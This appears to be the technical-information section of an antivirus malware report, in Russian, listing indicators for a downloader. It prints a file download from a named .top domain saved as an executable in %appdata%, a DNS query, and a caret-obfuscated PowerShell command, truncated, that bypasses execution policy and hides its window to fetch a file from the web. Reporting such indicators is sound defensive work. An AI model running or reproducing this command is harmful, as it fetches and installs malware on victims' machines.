Техническая информация
- http://aoopoerope.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^weRsheLL^.^E^x^E ^-^ExE^CUTioN^p^OLI^cy^ ^by^pasS -n^Op^r^OFiL^E^ -w^inDOwS^T^Yl^e hiDde^N^ (^nEW-o^bj^e^c^T S^y^S^T^e^M.n^ET.We^bcLIe^n^T^).dO^Wnl^o^aD^fIl^e^(^'http://a...
- DNS ASK ao###erope.top
- '<SYSTEM32>\cmd.exe' /c "p^O^weRsheLL^.^E^x^E ^-^ExE^CUTioN^p^OLI^cy^ ^by^pasS -n^Op^r^OFiL^E^ -w^inDOwS^T^Yl^e hiDde^N^ (^nEW-o^bj^e^c^T S^y^S^T^e^M.n^ET.We^bcLIe^n^T^).dO^Wnl^o^aD^fIl^e^(^'http://a...' (со скрытым окном)